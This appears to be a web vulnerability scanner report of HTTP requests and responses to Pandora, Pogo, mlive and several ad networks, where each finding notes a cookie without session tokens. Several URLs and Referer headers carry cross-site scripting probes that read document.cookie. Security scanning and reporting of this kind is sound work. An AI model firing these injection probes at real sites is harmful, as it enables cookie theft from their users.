HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Fri, 08-Jul-2011 01:48:35 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 01:48:35 GMT Content-Length: 377
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /usersync?calltype=admeld&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1 Host: admeld.adnxs.com Proxy-Connection: keep-alive Referer: http://www.pandora.com/include/communityAdEmbed.html?genre=&artist=&webname=&sz=728x90&ord=1294536136217419152&clean=0&spgs=0&tile=1&_id=leaderboard_container Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: anj=Kfu=8fG7]PCxrx)0s]#%2L_'x%SEV/hnJipx9oC)FXduyOWimI4KKhq.W^v=7v!+J; sess=1; uuid2=4760492999213801733
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Mon, 10-Jan-2011 02:01:48 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sat, 09-Apr-2011 02:01:48 GMT; domain=.adnxs.com; HttpOnly Content-Type: application/x-javascript Date: Sun, 09 Jan 2011 02:01:48 GMT Content-Length: 155
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ads/ads.js?uid=ZC45X9Axu6NOUFfX_261541 HTTP/1.1 Host: ads.adxpose.com Proxy-Connection: keep-alive Referer: http://www.pandora.com/include/communityAdEmbed.html?genre=&artist=&webname=&sz=2000x8&ord=1294536136217419152&clean=0&spgs=0&tile=2&_id=bottom_leaderboard_container Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=C8DDA40C8F4C2B65082C50B995B886FC; Path=/ ETag: "0-gzip" Cache-Control: must-revalidate, max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" Set-Cookie: evlu=9f6f0757-8308-4d33-b185-c4e0ced3c79a; Domain=adxpose.com; Expires=Fri, 27-Jan-2079 05:15:53 GMT; Path=/ Content-Type: text/javascript;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 02:01:46 GMT Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ad/js/55290?mpt=3334527&mpvc=&no_cj_c=0&upsid=517004695355 HTTP/1.1 Host: altfarm.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Moved Temporarily Server: Apache-Coyote/1.1 Cache-Control: no-cache Set-Cookie: svid=517004695355; expires=Wed, 8-Jan-2014 5:33:36 GMT; path=/; domain=.mediaplex.com; P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV" Location: http://img.mediaplex.com/cgi-bin/html/0/7440/MT_300x250_8428_watermelonnew.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F7440-39748-1543-3%3Fmpt%3D3334527&mpt=3334527&mpvc= Content-Length: 0 Date: Sun, 09 Jan 2011 02:01:54 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b?c1=2&c2=6036333&rn=1663368886&c7=http%3A%2F%2Fwww.pandora.com%2Fpeople%2F%3Fcf8db%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E09862348e83%3D1&c4=http%253A%2F%2Fwww.pandora.com%2Fpeople%2F%253Fcf8db%252522%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%2Fscript%25253E09862348e83%253D1&c8=Pandora%20Radio%20-%20Listen%20to%20Free%20Internet%20Radio%2C%2&c9=http%3A%2F%2Fburp%2Fshow%2F1&cv=2.2&cs=js HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.pandora.com/people/?cf8db%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E09862348e83=1 Cache-Control: max-age=0 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 204 No Content Content-Length: 0 Date: Sun, 09 Jan 2011 01:22:52 GMT Connection: close Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Tue, 08-Jan-2013 01:22:52 GMT; path=/; domain=.scorecardresearch.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /p?c1=8&c2=6035179&c3=1&c4=65044&c5=128887&c6=&cv=1.3&cj=1&rn=606698040 HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.pandora.com/include/communityAdEmbed.html?genre=&artist=&webname=&sz=728x90&ord=1294536160339719001&clean=0&spgs=0&tile=1&_id=leaderboard_container Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Length: 43 Content-Type: image/gif Date: Sun, 09 Jan 2011 01:22:56 GMT Connection: close Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Tue, 08-Jan-2013 01:22:56 GMT; path=/; domain=.scorecardresearch.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /r?c2=6035165&d.c=gif&d.o=eapogocom&d.x=268141464&d.t=page&d.u=http%3A%2F%2Fwww.pogo.com%2Fhome%2Fhome.jsp%3Ff9258%2522%253E%253Cscript%253Ealert%281%29%253C%2Fscript%253E4225969d669%3D1&d.r=http%3A%2F%2Fburp%2Fshow%2F2 HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Length: 43 Content-Type: image/gif Date: Sun, 09 Jan 2011 01:24:25 GMT Connection: close Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Tue, 08-Jan-2013 01:24:25 GMT; path=/; domain=.scorecardresearch.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /?pageSection=footer_board HTTP/1.1 Host: board-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /games/monopoly HTTP/1.1 Host: board-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /games/online-chess HTTP/1.1 Host: board-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /games/risk HTTP/1.1 Host: board-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /BurstingPipe/BannerSource.asp?FlightID=2111603&Page=&PluID=0&Pos=7971\ HTTP/1.1 Host: bs.serving-sys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: U=0a5bbe64-f3a2-4a01-921a-a3ef743897893G6020; A2=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; B2=; u2=0a5bbe64-f3a2-4a01-921a-a3ef743897893G6020; E2=09MY8y8ysF; C3=; u3=1; D3=;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4288750%7E%7E0%5Eeb25Per_Played%7E0%7E0%7E1%7E0%7E1%7E12036752%7E0%5EebVideoStarted%7E0%7E0%7E1%7E0%7E1%7E12036752%7E0&OptOut=0&ebRandom=0.4333476326428354&flv=10.1103&wmpv=0&res=128 HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com/exhibit/loading/loading.jsp?pwid=760&phei=574&site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: E2=09MY820wsF; A2=gn3Ka4JO09MY0000820wsF; B2=83xP0820wsF; C3=0u3F820wsF0000040_; D3=0u3F0035820wsF; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; u3=1; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2111603&PluID=0&w=500&h=350&ord=3732683&ucm=true&ifl=$$ads/eyeblaster/addineyev2.jsp$$&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3a8a/3/0/%2a/u%3B231345033%3B0-0%3B7%3B27597681%3B2361-500/350%3B40124842/40142629/1%3B%3B%7Eaopt%3D3/0/ff/0%3B%7Esscs%3D%3f$$ HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com/exhibit/loading/loading.jsp?pwid=760&phei=574&site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: card-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /games/cribbage HTTP/1.1 Host: card-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /games/rainy-day-spider-solitaire HTTP/1.1 Host: card-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /fs-bin/stat?id=FLenzF8lvbI&offerid=78941&type=3&subid=0&tmpid=1826 HTTP/1.1 Host: click.linksynergy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<html> <head> <title>301 Moved Permanently</title> </head> <body> <p>The page you are requesting has moved to <a href="&partnerId=30&siteID=FLenzF8lvbI-jRY9Ep2QlsT7E2gTD46DFg">&partnerId=30&siteI ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: clubpogo-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: flash-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/4252/4762/6670-15.js?cb=0.8619239274412394 HTTP/1.1 Host: optimized-by.rubiconproject.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/?sl=2&f9258%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4225969d669=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ruid=154d290e46adc1d6f373dd09^1^1294536262^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=4252/4762; ses15=4762^1; rpb=4210%3D1; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; cd=false; au=GIP9HWY4-MADS-10.208.38.239
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 01:25:15 GMT Server: RAS/1.3 (Unix) Set-Cookie: rdk=4252/4762; expires=Sun, 09-Jan-2011 02:25:15 GMT; max-age=60; path=/; domain=.rubiconproject.com Set-Cookie: rdk15=0; expires=Sun, 09-Jan-2011 02:25:15 GMT; max-age=10; path=/; domain=.rubiconproject.com Set-Cookie: ses15=4762^2; expires=Mon, 10-Jan-2011 05:59:59 GMT; max-age=110084; path=/; domain=.rubiconproject.com P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: csi15=3188204.js^1^1294536315^1294536315; expires=Sun, 16-Jan-2011 01:25:15 GMT; max-age=604800; path=/; domain=.rubiconproject.com; Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Wed, 17 Sep 1975 21:32:10 GMT Connection: close Content-Type: application/x-javascript Content-Length: 2391
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: puzzle-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /games/bejeweled2 HTTP/1.1 Host: puzzle-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /games/yahtzee-party HTTP/1.1 Host: puzzle-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /server/pixel.htm HTTP/1.1 Host: r.turn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=3011330574290390485; rds=undefined%7Cundefined%7Cundefined%7C14983; pf=TiY2Y7UsIzsDKs0LviDMrF7Y4FfMul_JqNyl-f7qrdKJwV9kSIzX4BtZ7vBDkFqi6PyIdXvx0rnLfhzRtOOBc34lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; rv=1; rrs=undefined%7Cundefined%7Cundefined%7C4;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Fri, 08-Jul-2011 02:25:53 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:25:52 GMT Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /click/site=0000758630/mnum=0000906164/cstr=52607936=_4d290f90,0846642328,758630^906164^1^0,1_/xsxdata=$xsxdata/bnum=52607936/optn=64?trg=;ord=0846642328? HTTP/1.1 Host: r1.ace.advertising.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 52607936=_4d290f90,0846642328,758630^906164^1^0,0_; F1=BA5Dp0EBAAAABAAAAEAAgEA; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|; BASE=YnQIy9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWK!; ACID=Bc330012940999670074; GUID=MTI5NDQ1NDc3MDsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; C2=Q+QKNJpwIg02FwBCdbdBcA7gHw8jGSgsjhADgaAL; ROLL=v5Q2V0cRVUyqcZK!;
Response
HTTP/1.1 302 Found Connection: close Date: Sun, 09 Jan 2011 02:25:58 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y" Location: /;ord=0846642328? Set-Cookie: C2=3yRKNJpwIg02FlBCdbdRZA7gHw8jGHgsjhADgaUKCKCC9mUBwxKkmhUiGgK; domain=advertising.com; expires=Tue, 08-Jan-2013 02:25:58 GMT; path=/ Set-Cookie: 52607936=_4d290f90,0846642328,758630^906164^1^0,0_; domain=advertising.com; path=/click Set-Cookie: 0846642328=_4d290f90,0846642328,758630^906164^1^0,1_; domain=advertising.com; path=/click Cache-Control: private, max-age=0, no-cache Expires: Sun, 09 Jan 2011 02:25:58 GMT Content-Type: text/html; charset=utf-8 Content-Length: 142
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2f%3bord%3d0846642328%3f">here</a>.</h2> </body></html>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site=755399/size=300250/u=2/bnum=72318651/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.mlive.com%252F%253Fdb83d%2527-alert%2528document.cookie%2529-%2527e027fe9bbf5%253D1 HTTP/1.1 Host: r1.ace.advertising.com Proxy-Connection: keep-alive Referer: http://www.mlive.com/?db83d'-alert(document.cookie)-'e027fe9bbf5=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ACID=Bc330012940999670074; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|; GUID=MTI5NDUzNzcyMDsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; C2=UQRKNJpwIg02FAHCdbdBwB7gHw8jGPgsjhADga0KoiTATslBrB; F1=BQBFp0EBAAAABAAAAMAAaEA; BASE=YnQIw9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AiN!; ROLL=v5Q2X0cRVUyqcZa/vGc3WhvkMxIiWOC!
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 09 Jan 2011 01:49:09 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y" Comscore: CMXID=2115.944664.755399.0XMC Set-Cookie: F1=BUBFp0kAAAAAHb4CAEAAgEABAAAABAAAAQAAaEA; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:09 GMT; path=/ Set-Cookie: BASE=YnQIx9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WF!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:09 GMT; path=/ Set-Cookie: ROLL=v5Q2Q0cRVUyqcZa/vGc3WhvkMxIiWOS7HgfCaOA!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:09 GMT; path=/ Set-Cookie: 72318651=_4d291415,1206372681,755399^944664^1183^0,0_; domain=advertising.com; path=/click Cache-Control: private, max-age=0, no-cache Expires: Sun, 09 Jan 2011 01:49:09 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 1047
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site=758630/size=160600/u=2/bnum=52607936/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.pogo.com%252Fgames%252Fscrabble%253FpageSection%253Dfree_home_hot_games1_pl_scrabble HTTP/1.1 Host: r1.ace.advertising.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/games/scrabble?pageSection=free_home_hot_games1_pl_scrabble Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ACID=Bc330012940999670074; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|; F1=B4hZi0EBAAAABAAAAcAAgEA; BASE=YnQI99MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YM!; ROLL=v5Q2T0cD6byq6qaxJoe34Sv8XRJi49SB7jfC09AP2YSOminn1Wmq7LDEe81vdCC!; C2=y/8JNJpwIg02FAGCdbdBgB7gHw8jGiksjhADgaAc; GUID=MTI5NDQ1NDc3MDsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 09 Jan 2011 01:29:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y" Comscore: CMXID=2115.906164.758630.0XMC Set-Cookie: C2=Q+QKNJpwIg02FwBCdbdBcA7gHw8jGSgsjhADgaAL; domain=advertising.com; expires=Tue, 08-Jan-2013 01:29:52 GMT; path=/ Set-Cookie: F1=BA5Dp0EBAAAABAAAAEAAgEA; domain=advertising.com; expires=Tue, 08-Jan-2013 01:29:52 GMT; path=/ Set-Cookie: BASE=YnQIy9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWK!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:29:52 GMT; path=/ Set-Cookie: ROLL=v5Q2V0cRVUyqcZK!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:29:52 GMT; path=/ Set-Cookie: 52607936=_4d290f90,0846642328,758630^906164^1^0,0_; domain=advertising.com; path=/click Cache-Control: private, max-age=0, no-cache Expires: Sun, 09 Jan 2011 01:29:52 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 595
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
